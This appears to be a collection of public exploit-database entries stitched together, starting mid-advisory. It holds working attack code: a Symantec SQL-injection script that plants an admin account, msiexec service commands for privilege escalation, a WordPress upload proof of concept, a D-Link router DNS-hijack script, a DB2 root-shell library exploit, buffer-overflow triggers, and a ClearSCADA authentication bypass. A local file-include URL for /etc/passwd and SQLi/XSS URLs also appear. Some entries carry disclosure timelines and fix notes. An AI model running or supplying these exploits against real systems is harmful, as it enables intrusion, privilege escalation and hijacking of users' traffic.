'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1);
The code used to exploit the SQL injection vulnerability is listed below:
import httplib
def send_request(host,data):
params = data
headers = {"AppFire-Format-Version": "1.0",
"AppFire-Charset": "UTF-16LE",
"Content-Type":"application/x-appfire",
"User-Agent":"Java/1.7.0_45",
}
conn = httplib.HTTPSConnection(host)
conn.request("POST", "/sis-ui/authenticate", params, headers)
response = conn.getresponse()
data=response.read()
conn.close()
return response,data
header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME,
PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO,
PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)
VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '',
'', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12
07:13:23', '1', '0', '0',
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
-- '' " # add user to USR table
#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID,
ROLERID) VALUES (1504, 1); -- " # add user to admin group
data+="\r\nan=Symantec Data Center Security Server
6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
data = data.encode('utf-16le')
eof_flag="\nEOF_FLAG\n"
header = header %(len(data))
payload=header+data+eof_flag
response,data = send_request("<host>:4443",payload)
print data.decode('utf-16le')
print response.status
As the application users act as Tomcat administrators, an attacker can login
into the Tomcat manager as well. The Tomcat manager is available by default
via TCP port 8081 HTTPS.
The Tomcat Web Application Manager can be used to deploy new .war-files
containing attacker-controlled Java code. This allows an attacker to execute
arbitrary commands on the operating system with the permissions/user of the
"Symantec Data Center Security Server Manager" service (SISManager) which are
SYSTEM.
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
At least the following URLs are vulnerable to XSS:
https://example.com:8081/webui/Khaki_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>
https://example.com:8081/webui/admin/WCUnsupportedClass.jsp?classname=<script>alert('xss')</script>
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
The following URLs discloses internal information:
https://example.com:8081/webui/admin/environment.jsp
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)
(CVE-2014-9226)
- Persistent code execution via Windows Services
Windows Service binaries can have file extensions other than ".exe". This
allows an attacker to execute arbitrary files and enables automatic execution
of malicious code at OS boot.
- Remote code execution via RPC
Existing tools like "psexec" or Metasploit (/exploit/windows/smb/psexec) can
be modified to write files not ending with ".exe" on the target system.
- Policy bypass: Extraction of Windows passwords/hashes
The tool "mimikatz" can be used to extract Windows credentials.
- Privilege elevation via Windows Installer (msiexec.exe)
msiexec.exe is trusted "safe privileges" when started as a service (usually
"Windows Installer" parameter "/V"). This can be abused by creating a service
that starts msiexec.exe with the parameters "/quiet", "/i" and a path to a valid
.msi file. Upon service start the .msi file is executed with "safe privileges"
privileges and not subject to any SDCS:SA Client checks.
sc create evil_service binpath= "c:\windows\System32\msiexec.exe /quiet /i
c:\temp\evil_msi" type= own start= auto error= ignore
net start evil_service
- Privilege elevation/code execution via Windows Management Instrumentation
(.mof files)
On old Windows versions .mof files placed in "%SystemRoot%\System32\wbem\mof\"
are automatically compiled/executed. These trigger arbitrary code execution.
The code is executed with "def_winsvcs_ps" permissions.
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Symantec Data Center
Security: Server Advanced version 6.0, which was the most recent version at
the time of discovery.
However other versions (SCSP 5.2.9) are affected by the vulnerabilities as
well. See the vendor information in the Solution section.
Vendor contact timeline:
------------------------
2014-10-20: Sending advisory and proof of concept exploit via encrypted
channel.
2014-10-20: Vendor acknowledges receipt of advisory.
2014-11-18: Requesting status update.
2014-11-18: Vendor responds and informs about an advisory in December,
version containing fixes in February.
2014-12-04: Vendor informs about delays in releasing fixes/mitigations,
target release date mid-January.
2015-01-08: Vendor confirms release date for fixes/mitigations (2015-01-17).
2015-01-17: Vendor releases fixes for SCSP.
2015-01-19: Vendor releases advisory and mitigations for SCSP/
2015-01-22: SEC Consult releases coordinated security advisory.
Solution:
---------
Update to the most recent version of SCSP (5.2.9 MP6) or SDCS:SA (6.0 MP1).
Not all vulnerabilities are fixed by this update! However, Symantec has
provided mitigations for these issues:
More information can be found at:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150119_00
http://www.symantec.com/business/support/index?page=content&id=TECH227679
http://www.symantec.com/business/support/index?page=content&id=HOWTO100996&actp=search&viewlocale=en_US&searchid=1421349750071
Workaround:
-----------
See solution.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF Stefan Viehböck / @2015
# Exploit Title: Photo Gallery 1.2.5 Unrestricted File Upload
# Date: 11-11-2014
# Software Link: https://wordpress.org/plugins/photo-gallery/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9312
# Category: webapps
1. Description
Every registered user (even Subscriber) can access upload functionality because of read role used inside UploadHandler.php
http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html
2. Proof of Concept
Login as regular user (created using wp-login.php?action=register).
Pack .php files into .zip archive then send it using:
<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/" enctype="multipart/form-data">
<input type="file" name="files">
<input type="submit" value="Hack!">
</form>
Your files will be visible inside:
http://wordpress-install/wp-admin/rce/
3. Solution:
Update to version 1.2.6
https://downloads.wordpress.org/plugin/photo-gallery.1.2.6.zip
#!/bin/bash
#
# D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit
#
# Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
#
# Description:
# Different D-Link Routers are vulnerable to DNS change.
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
# DEVICES MAY AFFECTED.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit"
echo " ================================================================"
echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
echo " Example: $0 192.168.1.1 8.8.8.8"
echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
echo " http://www.ethical-hacker.org/"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET "http://$1/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=$2&dnsSecondary=$3" 0&> /dev/null <&1
// source: https://www.securityfocus.com/bid/48514/info
IBM DB2 is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue to gain elevated privileges and execute arbitrary code with root privileges. Successfully exploiting this issue will result in a complete compromise of the affected system.
IBM DB2 9.7 is vulnerable; other versions may also be affected.
/*
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the Nth Dimension nor the names of its contributors may
be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
(c) Tim Brown, 2011
<mailto:timb@nth-dimension.org.uk>
<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
PoC exploit for IBM DB2 DT_RPATH privesc.
*/
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv) {
FILE *badlibkbbsrchandle;
int pwnedflag;
printf("PoC exploit for IBM DB2 DT_RPATH privesc.\r\n");
printf("(c) Tim Brown, 2011\r\n");
printf("<mailto:timb@nth-dimension.org.uk>\r\n");
printf("<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>\r\n");
printf("Constructing bad_libkbb.so...\r\n");
badlibkbbsrchandle = fopen("bad_libkbb.c", "w");
fprintf(badlibkbbsrchandle, "#include <stdio.h>\r\n");
fprintf(badlibkbbsrchandle, "#include <unistd.h>\r\n");
fprintf(badlibkbbsrchandle, "#include <stdlib.h>\r\n");
fprintf(badlibkbbsrchandle, "\r\n");
fprintf(badlibkbbsrchandle, "void __attribute__ ((constructor)) bad_libkbb(void) {\r\n");
fprintf(badlibkbbsrchandle, " printf(\"Have a root shell...\\r\\n\");\r\n");
fprintf(badlibkbbsrchandle, " setuid(geteuid());\r\n");
fprintf(badlibkbbsrchandle, " system(\"/usr/bin/id\");\r\n");
fprintf(badlibkbbsrchandle, " system(\"/bin/sh\");\r\n");
fprintf(badlibkbbsrchandle, " exit(0);\r\n");
fprintf(badlibkbbsrchandle, "}\r\n");
fclose(badlibkbbsrchandle);
system("gcc -shared -fPIC -o libkbb.so bad_libkbb.c");
system("/opt/ibm/db2/V9.7/itma/tmaitm6/lx8266/bin/kbbacf1");
exit(0);
}
// source: https://www.securityfocus.com/bid/48528/info
NetBSD is prone to a stack-based buffer-overflow vulnerability affecting multiple functions in the 'libc/net' library.
Successful exploits may allow an attacker to execute arbitrary code in the context of the application using the affected library. Failed exploit attempts will result in a denial-of-service condition.
/*
127# gcc -o grr grr.c && ./grr 6050
127# gcc -o grr grr.c && ./grr 6051
Memory fault (core dumped)
127#
*/
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
int main(int argc, char *argv[]){
char *cycek;
cycek=malloc(atoi(argv[1]));
if(!cycek) return 1;
memset(cycek,'A',atoi(argv[1]));
getservbyname(cycek,"tcp");
return 0;
}
source: https://www.securityfocus.com/bid/48550/info
iMesh is prone to a buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied data.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using an affected ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
iMesh 10.0 is vulnerable; other versions may also be affected.
<!--
###
# Title : iMesh <= 10.0 (IMWebControl.dll) Remote Buffer Overflow Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com
# Twitter page : twitter.com/kedans
# platform : windows
# Impact : Remote Buffer Overflow & DLL Hijacked
##
# <3 Liyan Oz + All UE-Team & I.BackTrack Team <3
###
-->
<?XML version='1.0' standalone='yes' ?>
<package>
<job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B97' id='target'/>
<script language='vbscript'>
'Wscript.echo typename(target)
targetFile = "C:\Program Files\iMesh Applications\iMesh\IMWebControl.dll"
prototype = "ProcessRequestEx ( ByVal sourceName As String , ByVal destName As String , ByVal bFailIfExists As Long )"
memberName = "ProcessRequestEx"
progid = "target.IMWebControl"
buf=String(31337, "A") ' Buffer Overflow
puf=218959117 'set ecx to 0x0d0d0d0d
target.SetHandler puf
target.ProcessRequestEx buf ,puf ' Bo0M !
</script>
</job>
</package>
<!--
#================[ Exploited By KedAns-Dz * Inj3ct0r * ]=========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > ++ Liyan Oz & Blackrootkit ..all
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)
# Jago-Dz (sec4ever.com) * Kalashinkov3 * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * Underground Exploitation (www.dis9.com) * All Security and Exploits Webs ...
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================
-->
source: https://www.securityfocus.com/bid/48558/info
The 'com_jr_tfb' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
http://www.example.com/index.php?option=com_jr_tfb&controller=../../../../../../../../etc/passwd%00
source: https://www.securityfocus.com/bid/48559/info
Paliz Portal is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/Page.aspx?search=1[XSSCode]&mID=1641&Page=search/advancedsearch
http://www.example.com/News/shownews/[page].aspx?NewsId=[Sqli]
http://www.example.com/[Path]/Default.aspx?tabid=[Sqli]
#!/usr/bin/python
# cs-auby.py
# ClearSCADA Remote Authentication Bypass Exploit
#
# Jeremy Brown
# [jbrown3264/gmail]
#
# Oct 2010 (released Jan 2015)
#
# There is an authentication bypass vulnerability in ClearSCADA that can be
# exploited by triggering an exception in dbserver.exe and taking advantage
# of the way the program handles it.
#
# When an exception in occurs, ClearSCADA enters "Safe Mode". This exposes
# it's diagnostic functions to remote users without requiring a valid login
# as it would normally. A remote attacker could view senstive information
# and possibly modify functions of the server running on the affected host.
#
# This code triggers an exception in dbserver.exe and checks to see if you
# can then access the diagnostic page without authentication.
#
# Tested on ClearSCADA 2010R1 running on Windows
#
# Fix information: http://ics-cert.us-cert.gov/advisories/ICSA-11-173-01
#
import sys
import socket
import httplib
import urllib
from time import sleep
pkt_1=(
"\xfb\x0e\x45\x06\x0e\x00\x00\x00\x18\x00\x00\x00"
"\x49\x00\x50\x00\x20\x00\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00"
"\x2e\x00\x30\x00\x2e\x00\x31\x00\x2c\x00\x20\x00\x53\x00\x65\x00"
"\x73\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x20\x00\x30\x00\x00\x00"
"\x08\x00\x00\x00"
)
pkt_2=(
"\x00\x00\x00\x00"
"\x26\x00\x00\x00"
"\x08\x00\x00\x00\x0f\x00\x00\x00\x43\x00\x72\x00\x79\x00\x73\x00"
"\x74\x00\x61\x00\x6c\x00\x52\x00\x65\x00\x70\x00\x6f\x00\x72\x00"
"\x74\x00\x73\x00\x00\x00"
)
pkt_3=( # "Exception Occured"
"\x00\x00\x00\x00\xd7\x01\x00\x00\x34\x00\x00\x00\x0d\x00\x00\x00"
"\x09\x00\x00\x00\x43\x00\x50\x00\x72\x00\x6f\x00\x66\x00\x69\x00"
"\x6c\x00\x65\x00\x00\x00\x0e\x00\x00\x00\x43\x00\x50\x00\x72\x00"
"\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x46\x00\x6c\x00\x6f\x00"
"\x61\x00\x74\x00\x00\x00\x0e\x00\x00\x00\x43\x00\x50\x00\x72\x00"
"\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x55\x00\x4c\x00\x6f\x00"
"\x6e\x00\x67\x00\x00\x00\x0d\x00\x00\x00\x43\x00\x50\x00\x72\x00"
"\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x4c\x00\x6f\x00\x6e\x00"
"\x67\x00\x00\x00\x10\x00\x00\x00\x43\x00\x41\x00\x64\x00\xBB\x00" # last w0rd
"\x00\x42\x00\x49\x00\x54\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65"
"\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41"
"\x00\x64\x00\x76\x00\x42\x00\x59\x00\x54\x00\x45\x00\x56\x00\x61"
"\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x11"
"\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x57\x00\x4f\x00\x52"
"\x00\x44\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61"
"\x00\x70\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76"
"\x00\x44\x00\x49\x00\x4e\x00\x54\x00\x56\x00\x61\x00\x6c\x00\x75"
"\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x12\x00\x00\x00\x43"
"\x00\x41\x00\x64\x00\x76\x00\x55\x00\x44\x00\x49\x00\x4e\x00\x54"
"\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70"
"\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x52"
"\x00\x45\x00\x41\x00\x4c\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65"
"\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x13\x00\x00\x00\x43\x00\x41"
"\x00\x64\x00\x76\x00\x44\x00\x4f\x00\x55\x00\x42\x00\x4c\x00\x45"
"\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70"
"\x00\x00\x00\x13\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x53"
"\x00\x74\x00\x72\x00\x69\x00\x6e\x00\x67\x00\x56\x00\x61\x00\x6c"
"\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x0f\x00\x00"
"\x00\x43\x00\x43\x00\x72\x00\x79\x00\x73\x00\x74\x00\x61\x00\x6c"
"\x00\x52\x00\x65\x00\x70\x00\x6f\x00\x72\x00\x74\x00\x00\x00\x00"
)
port=5481
s_port=443
def do_ssl(target,port):
try:
conn = httplib.HTTPSConnection(target,port)
conn._http_vsn = 10
conn._http_vsn_str = "HTTP/1.0"
conn.request("GET","/diag/Info")
resp = conn.getresponse()
conn.close()
except Exception, error:
print("Error: %s" % error)
return None
return resp
def main():
if len(sys.argv)!=2:
print("Usage: %s <target>" % sys.argv[0])
sys.exit(0)
target=sys.argv[1]
cs=target,port
print "Checking server status..."
resp = do_ssl(target,s_port)
if(resp == None):
return
if(resp.status==301):
print "Server status is normal.\n"
elif(resp.status==200):
print "Server is already in safe mode."
sys.exit(1)
elif((resp.status!=301)|(resp.status!=200)):
print("Server returned %d %s, server state unknown.\nContinuing anyways..\n" % (resp.status,resp.reason))
print("Sending packets to trigger exception...\n")
try:
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)
sock.send(pkt_1)
resp_1 = sock.recv(32)
sock.send(pkt_2)
resp_2 = sock.recv(32)
sock.send(pkt_3)
resp_3 = sock.recv(32)
sock.close()
except Exception, error:
print("Error: %s" % error)
return None
print("Finished, checking server status again...")
sleep(1)
resp = do_ssl(target,s_port)
if(resp == None):
return
if(resp.status==301):
print("Server status is still normal, maybe it's patched..\n")
elif(resp.status==200):
print("Server entered \"safe\" mode :)\n")
print("Surf on over to https://%s:443/diag/Info to explore" % target)
elif((resp.status!=301)|(resp.status!=200)):
print("Server returned %d %s, server state unknown." % (resp.status,resp.reason))
if __name__ == "__main__":
main()
source: https://www.securityfocus.com/bid/48561/info
eTAWASOL is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/npages/back.asp?id=[SQL]